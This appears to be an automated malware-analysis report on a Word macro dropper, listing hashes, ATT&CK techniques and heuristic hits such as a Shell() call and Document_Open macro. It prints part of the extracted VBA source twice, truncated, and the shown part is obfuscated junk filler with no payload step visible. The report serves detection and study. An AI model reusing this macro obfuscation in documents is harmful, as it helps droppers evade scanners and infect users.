Doc.Dropper.Valyria-6680534-0 Office (OLE) malware analysis — malicious · 54f695dc4f5498b1

MALICIOUS

Office (OLE)

154.0 KB Created: 2018-07-24 07:21:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 751d6f55f351a3af0b9cb073f0d4a0d1 SHA-1: 4389ac84b495816fe222394d4c4d6437be27f3a0 SHA-256: 54f695dc4f5498b1b04287dbe71674273a3252e0f18e924b8acd8909f33c7caa

182 Risk Score

Malware Insights

Doc.Dropper.Valyria-6680534-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, including a Document_Open macro, and utilizes the Shell() function, indicating it's designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Valyria-6680534-0' strongly suggests its purpose is to drop and execute a secondary payload. The embedded URL is benign, but the overall behavior points to a malicious dropper.

Heuristics 5

ClamAV: Doc.Dropper.Valyria-6680534-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6680534-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30380 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30380 bytes
SHA-256: `b9e9e7c3ba4136470bb5eeb68d6a39de7110927098e3b8f49d9a71f3fca7e276`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jYzMtfRzD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function KRnAPrWG() On Error Resume Next If pvwwiQ Xor VBFVV Then wBDAYv = jfiiMH * miDiz - 43984 / AmLcvu / FwiQjz + 11836 * 87323 * sCJPS * 19853 / PkWsj Else zXXwtz = 203917903 / sYcAB End If If HRNcjX Xor moZVtN Then aQwHf = vHjXO * PPwMCs - 63969 / sNKhY / Jwwmv + 51434 * 72836 * ONPwj * 73576 / zhpNwI Else pcXcMN = 203917903 / NFRjM End If If nuJkbj Xor UQXIm Then FwjnZ = oEsRvp * CZvBw - 27061 / SiTCp / AMKQju + 97341 * 73165 * wrzENI * 45255 / cOvOdr Else OYumj = 203917903 / cizsz End If If ZPIYrP Xor tzjUT Then abLRi = sCWFU * szbPv - 44056 / kPoYqf / darQWq + 82581 * 12941 * YDanp * 99542 / CKoNzR Else dEJajv = 203917903 / DUlkoR End If If KzcnzC Xor izDIv Then tfUUZ = cGUOS * YrBHw - 28949 / phokN / wFfHiT + 38503 * 33796 * bhlzJC * 38085 / qiJZaK Else bzolFl = 203917903 / vGtbE End If If blAqaU Xor DEuArv Then rotSXU = CHAMCK * NzMPj - 57738 / rNEoI / VKitu + 78241 * 67068 * pEaaHI * 48663 / AiYJHq Else ilLRU = 203917903 / aodOFP End If If jdUlk Xor MUjEl Then lNCRw = rOLNP * LbVio - 4834 / ijwbK / NhfRjZ + 41615 * 96451 * ApRTmc * 49796 / uWOMaI Else dfjECl = 203917903 / msYkdL End If End Function Private Function pmMWbAQXQvfqY() On Error Resume Next If qiKdwM Xor FAoQzz Then LmwrtW = DbfHo * PaMuQU - 70361 / XnuBA / YnZUwX + 76465 * 29627 * UYJcn * 75148 / fVJlb Else ntAcMN = 203917903 / zDpskk End If If TmtzA Xor RYlnf Then VNwpUB = ZJjtiC * wTBasU - 60920 / zrHmuO / jLdsY + 28405 * 87482 * kPlBS * 24595 / tPuLZw Else LuKBm = 203917903 / GhhHU End If If oNjWqI Xor FERHJK Then IdNwiM = VwjRCO * cmzlQA - 57901 / ltFhwh / FTqFZ + 14879 * 34873 * sthsS * 31978 / EotPdS Else WtKTi = 203917903 / UszOIN End If If UPldaD Xor QKHTM Then Mwsri = IJAihX * fGChdj - 99041 / SddRlW / GAmroR + 3395 * 16331 * qYfLTU * 63153 / GwXzN Else dnNluU = 203917903 / azTQC End If If bzpTJ Xor EsjHL Then ooRni = plzwv * ZZzzv - 36262 / FZjdrE / TzPdJC + 16326 * 47743 * fbJfE * 46345 / TiBju Else XFzQXF = 203917903 / HLajmk End If End Function Private Function ScKRtbKfnGbqVv() On Error Resume Next If SwWfs Or THJLs Then AIkol = CLng(3121) ElseIf VPUKO Or 79884 Then vhqaZ = 494058195 - 428397415 End If If GQtsTO Or vBpjpY Then RRqna = CLng(3121) ElseIf wfwIkj Or 28553 Then cdjjRF = 494058195 - 428397415 End If If PsVXiZ Or faYRz Then PznzIn = CLng(3121) ElseIf RlHmzi Or 37086 Then IzYSS = 494058195 - 428397415 End If If wOiCsD Or rQufl Then PbTGQ = CLng(3121) ElseIf KuzwGk Or 37089 Then dfYakR = 494058195 - 428397415 End If If YzwoF Or hutwvr Then qPUSR = CLng(3121) ElseIf VIdBAh Or 40160 Then GQNZUG = 494058195 - 428397415 End If If FnOGR Or llGBj Then rpuTE = CLng(3121) ElseIf wsBQX Or 35624 Then bbLrT = 494058195 - 428397415 End If If BwNAL Xor kDIiLU Then IOrdWz = MbnPn * ksSHtw - 60971 / wCNjk / sGIOQ + 79530 * 8679 * skNzzk * 23529 / LwMSIs Else AlOpXJ = 203917903 / iwlYP End If End Function Private Function inOaKwh() On Error Resume Next If KGibN Xor PoWIO Then WCkjLL = wKoCv * RjbTi - 27740 / LBczd / FiuFNK + 59355 * 10565 * uzudw * 83762 / wWDnbv Else nUotwd = 203917903 / ZnGQG End If If DNfdPu Xor SbriZ Then KMVqL = crLAN * FabqP - 41278 / pPqswX / qFwzZi + 96892 * 68631 * swizFJ * 72917 / MSGKTf Else LVpkBU = 203917903 / ZSOjX End I ... (truncated)

SHA-256: b9e9e7c3ba4136470bb5eeb68d6a39de7110927098e3b8f49d9a71f3fca7e276

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jYzMtfRzD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function KRnAPrWG()
On Error Resume Next
   If pvwwiQ Xor VBFVV Then
      wBDAYv = jfiiMH * miDiz - 43984 / AmLcvu / FwiQjz + 11836 * 87323 * sCJPS * 19853 / PkWsj
      Else
      zXXwtz = 203917903 / sYcAB
   End If
   If HRNcjX Xor moZVtN Then
      aQwHf = vHjXO * PPwMCs - 63969 / sNKhY / Jwwmv + 51434 * 72836 * ONPwj * 73576 / zhpNwI
      Else
      pcXcMN = 203917903 / NFRjM
   End If
   If nuJkbj Xor UQXIm Then
      FwjnZ = oEsRvp * CZvBw - 27061 / SiTCp / AMKQju + 97341 * 73165 * wrzENI * 45255 / cOvOdr
      Else
      OYumj = 203917903 / cizsz
   End If
   If ZPIYrP Xor tzjUT Then
      abLRi = sCWFU * szbPv - 44056 / kPoYqf / darQWq + 82581 * 12941 * YDanp * 99542 / CKoNzR
      Else
      dEJajv = 203917903 / DUlkoR
   End If
   If KzcnzC Xor izDIv Then
      tfUUZ = cGUOS * YrBHw - 28949 / phokN / wFfHiT + 38503 * 33796 * bhlzJC * 38085 / qiJZaK
      Else
      bzolFl = 203917903 / vGtbE
   End If
   If blAqaU Xor DEuArv Then
      rotSXU = CHAMCK * NzMPj - 57738 / rNEoI / VKitu + 78241 * 67068 * pEaaHI * 48663 / AiYJHq
      Else
      ilLRU = 203917903 / aodOFP
   End If
   If jdUlk Xor MUjEl Then
      lNCRw = rOLNP * LbVio - 4834 / ijwbK / NhfRjZ + 41615 * 96451 * ApRTmc * 49796 / uWOMaI
      Else
      dfjECl = 203917903 / msYkdL
   End If
End Function
Private Function pmMWbAQXQvfqY()
On Error Resume Next
   If qiKdwM Xor FAoQzz Then
      LmwrtW = DbfHo * PaMuQU - 70361 / XnuBA / YnZUwX + 76465 * 29627 * UYJcn * 75148 / fVJlb
      Else
      ntAcMN = 203917903 / zDpskk
   End If
   If TmtzA Xor RYlnf Then
      VNwpUB = ZJjtiC * wTBasU - 60920 / zrHmuO / jLdsY + 28405 * 87482 * kPlBS * 24595 / tPuLZw
      Else
      LuKBm = 203917903 / GhhHU
   End If
   If oNjWqI Xor FERHJK Then
      IdNwiM = VwjRCO * cmzlQA - 57901 / ltFhwh / FTqFZ + 14879 * 34873 * sthsS * 31978 / EotPdS
      Else
      WtKTi = 203917903 / UszOIN
   End If
   If UPldaD Xor QKHTM Then
      Mwsri = IJAihX * fGChdj - 99041 / SddRlW / GAmroR + 3395 * 16331 * qYfLTU * 63153 / GwXzN
      Else
      dnNluU = 203917903 / azTQC
   End If
   If bzpTJ Xor EsjHL Then
      ooRni = plzwv * ZZzzv - 36262 / FZjdrE / TzPdJC + 16326 * 47743 * fbJfE * 46345 / TiBju
      Else
      XFzQXF = 203917903 / HLajmk
   End If
End Function
Private Function ScKRtbKfnGbqVv()
On Error Resume Next
   If SwWfs Or THJLs Then
      AIkol = CLng(3121)
      ElseIf VPUKO Or 79884 Then
      vhqaZ = 494058195 - 428397415
   End If
   If GQtsTO Or vBpjpY Then
      RRqna = CLng(3121)
      ElseIf wfwIkj Or 28553 Then
      cdjjRF = 494058195 - 428397415
   End If
   If PsVXiZ Or faYRz Then
      PznzIn = CLng(3121)
      ElseIf RlHmzi Or 37086 Then
      IzYSS = 494058195 - 428397415
   End If
   If wOiCsD Or rQufl Then
      PbTGQ = CLng(3121)
      ElseIf KuzwGk Or 37089 Then
      dfYakR = 494058195 - 428397415
   End If
   If YzwoF Or hutwvr Then
      qPUSR = CLng(3121)
      ElseIf VIdBAh Or 40160 Then
      GQNZUG = 494058195 - 428397415
   End If
   If FnOGR Or llGBj Then
      rpuTE = CLng(3121)
      ElseIf wsBQX Or 35624 Then
      bbLrT = 494058195 - 428397415
   End If
   If BwNAL Xor kDIiLU Then
      IOrdWz = MbnPn * ksSHtw - 60971 / wCNjk / sGIOQ + 79530 * 8679 * skNzzk * 23529 / LwMSIs
      Else
      AlOpXJ = 203917903 / iwlYP
   End If
End Function
Private Function inOaKwh()
On Error Resume Next
   If KGibN Xor PoWIO Then
      WCkjLL = wKoCv * RjbTi - 27740 / LBczd / FiuFNK + 59355 * 10565 * uzudw * 83762 / wWDnbv
      Else
      nUotwd = 203917903 / ZnGQG
   End If
   If DNfdPu Xor SbriZ Then
      KMVqL = crLAN * FabqP - 41278 / pPqswX / qFwzZi + 96892 * 68631 * swizFJ * 72917 / MSGKTf
      Else
      LVpkBU = 203917903 / ZSOjX
   End I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.